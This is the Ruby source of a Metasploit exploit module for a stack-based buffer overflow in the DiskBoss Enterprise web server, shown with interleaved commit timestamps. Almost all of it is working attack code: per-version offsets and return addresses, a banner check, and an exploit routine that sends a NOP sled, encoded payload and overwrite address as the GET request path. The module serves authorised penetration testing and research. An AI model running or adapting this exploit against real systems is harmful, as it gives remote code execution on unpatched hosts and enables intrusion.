metasploit-framework/modules/exploits/windows/http/diskboss_get_bof.rb

132 lines
3.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
2017-01-08 10:23:18 +00:00
in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
caused by improper bounds checking of the request path in HTTP GET
requests sent to the built-in web server. This module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Gabor Seljan' # Metasploit module
],
'References' =>
[
[' EDB', '40869']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20",
'Space' => 2000
},
'Targets' =>
[
2017-01-10 21:59:42 +00:00
[
'Automatic Targeting',
2017-01-08 10:23:18 +00:00
{
'auto' => true
}
],
2017-01-10 21:59:42 +00:00
[
'DiskBoss Enterprise v7.4.28',
{
'Offset' => 2471,
2017-01-08 10:23:18 +00:00
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
}
],
2017-01-10 21:59:42 +00:00
[
'DiskBoss Enterprise v7.5.12',
2017-01-08 10:23:18 +00:00
{
'Offset' => 2471,
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Dec 05 2016',
2017-01-10 21:59:42 +00:00
'DefaultTarget' => 0))
end
def check
2017-01-10 21:59:42 +00:00
res = send_request_cgi(
'method' => 'GET',
2017-01-10 21:59:42 +00:00
'uri' => '/'
)
if res && res.code == 200
2017-01-08 10:23:18 +00:00
if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
return Exploit::CheckCode::Vulnerable
elsif res.body =~ /DiskBoss Enterprise/
return Exploit::CheckCode::Detected
end
else
2017-01-10 21:59:42 +00:00
vprint_error('Unable to determine due to a HTTP connection timeout')
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
2017-01-08 10:23:18 +00:00
mytarget = target
2017-01-10 21:59:42 +00:00
if target['auto']
2017-01-08 10:23:18 +00:00
mytarget = nil
2017-01-10 21:59:42 +00:00
print_status('Automatically detecting the target...')
2017-01-08 10:23:18 +00:00
2017-01-10 21:59:42 +00:00
res = send_request_cgi(
2017-01-08 10:23:18 +00:00
'method' => 'GET',
2017-01-10 21:59:42 +00:00
'uri' => '/'
)
2017-01-08 10:23:18 +00:00
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
mytarget = targets[1]
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
mytarget = targets[2]
end
end
2017-01-10 21:59:42 +00:00
if !mytarget
fail_with(Failure::NoTarget, 'No matching target')
2017-01-08 10:23:18 +00:00
end
print_status("Selected Target: #{mytarget.name}")
end
sploit = make_nops(21)
sploit << payload.encoded
2017-01-08 10:23:18 +00:00
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
2017-01-10 21:59:42 +00:00
send_request_cgi(
'method' => 'GET',
2017-01-10 21:59:42 +00:00
'uri' => sploit
)
end
end